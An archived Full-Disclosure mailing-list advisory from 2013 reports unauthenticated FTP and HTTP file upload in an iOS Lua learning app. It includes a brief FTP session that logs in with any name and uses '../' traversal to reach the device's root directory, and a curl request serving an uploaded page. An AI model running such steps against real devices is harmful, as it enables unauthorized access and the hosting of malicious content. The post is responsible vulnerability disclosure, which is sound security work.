[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS

To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS
From: "Larry W. Cashdollar" <larry0@xxxxxx>
Date: Tue, 10 Sep 2013 21:19:31 +0000 (GMT)

<html><body><div><b style="font-family: Times; font-size: medium; ">TITLE: 
Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on 
iOS</b><span style="font-family: Times; font-size: medium; "></span><p 
style="font-family: Times; font-size: medium; ">Date: 8/1/2013</p><p 
style="font-family: Times; font-size: medium; ">Author: Larry W. Cashdollar, 
@_larry0</p><p style="font-family: Times; font-size: medium; ">Download:</p><ol 
style="font-family: Times; font-size: medium; 
"><li>https://itunes.apple.com/us/app/lua-programming-language/id578116006?mt=8&amp;ls=1</li><li>http://www.tayutec.com/indexen.html</li></ol><p
 style="font-family: Times; font-size: medium; ">Description: "Please download 
the "lua-programming language new". And do the following steps before using the 
app, you 'll give me a five-star praise ! ! 
http://sosilen.blog.163.com/blog/static/7727956620121029843220/</p><ul 
style="font-family: Times; font-size: medium; "><li>You can control the 
background image, and execution voice , text color and shadow , the number and 
the order of the main interface of the tab bar to create your learning 
software.</li><li>You can enter Lua code by keyboard, and then you can execut 
the Lua code.</li><li>You can save Lua code and learning materials, and can be 
modified to the save file and delete the save file .</li><li>You can Learn Lua 
knowledge , the system provides some basic learning materials .</li><li>You can 
use Lua code or learning materials to generate two-dimensional code , for easy 
sharing."</li></ul><br style="font-family: Times; font-size: medium; "><span 
style="font-family: Times; font-size: medium; ">One of the features is the 
ability to upload files via ftp &amp; http when the 'Computer&lt;-&gt;This 
machine' is selected.</span><br style="font-family: Times; font-size: medium; 
"><br style="font-family: Times; font-size: medium; "><br style="font-family: 
Times; font-size: medium; "><span style="font-family: Times; font-size: medium; 
">Vulnerabilities: 'iOSftp' &amp; http unauthenticated file uplolads. The 
application is sandboxed, but any remote user can read/write to the devices 
storage.</span><br style="font-family: Times; font-size: medium; "><span 
style="font-family: Times; font-size: medium; ">The uploaded content is served 
out of the http servers directory. While the http server doesn't process server 
side scripts it is possible to upload and serve malicious / illegal 
content.&nbsp;</span><br style="font-family: Times; font-size: medium; "><span 
style="font-family: Times; font-size: medium; ">I would think it's also 
possible to fill up the devices storage as well but did not test 
it.</span><pre>larry$ ftp 192.168.0.31  10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password: 
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; pwd
Remote directory: 
/private/var/mobile/Applications/9004C5D8-8154-406A-8D04-CE1C035BF813/Documents/ftp
 *
ftp&gt; cd ../../../../
250 CWD command successful.
ftp&gt; pwd
Remote directory: /private/var/mobile
ftp&gt; cd /
250 CWD command successful.
ftp&gt; pwd
Remote directory: /
ftp&gt; 

</pre><span style="font-family: Times; font-size: medium; ">* You also get path 
disclosure.</span><p style="font-family: Times; font-size: medium; ">http 
server listening on port 8080 allows arbitrary file writes to storage.</p><span 
style="font-family: Times; font-size: medium; ">You can create directories out 
side the upload path through the file upload web interface and the .. 
bug.</span><p style="font-family: Times; font-size: medium; "></p><span 
style="font-family: Times; font-size: medium; ">Because the application is 
sandbox I was unable to overwtite application executables and components so 
impact is limited. As stated above you can serve malicious content 
(javascript/html) via http.</span><p style="font-family: Times; font-size: 
medium; "><img src="http://vapid.dhs.org/advisories/webint.gif";>&nbsp;<br>After 
uploading hi.html through the web interface it's served off the http 
server:</p><pre>larry$ curl http://192.168.0.15:8080/hi.html
&lt;html&gt;
Hello, This is an HTML page
&lt;/html&gt;
</pre><p style="font-family: Times; font-size: medium; ">Vendor: Notified 
8/1/2013, https://twitter.com/tayutec</p><span style="font-family: Times; 
font-size: medium; ">Advisory: 
http://vapid.dhs.org/advisories/lua-ios-Huang-XiaoWen.html</span></div></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS
  - From: Larry W. Cashdollar

Prev by Date: [Full-disclosure] Synology DSM multiple vulnerabilities
Next by Date: Re: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS
Previous by thread: [Full-disclosure] Synology DSM multiple vulnerabilities
Next by thread: Re: [Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS
Index(es):
- Date
- Thread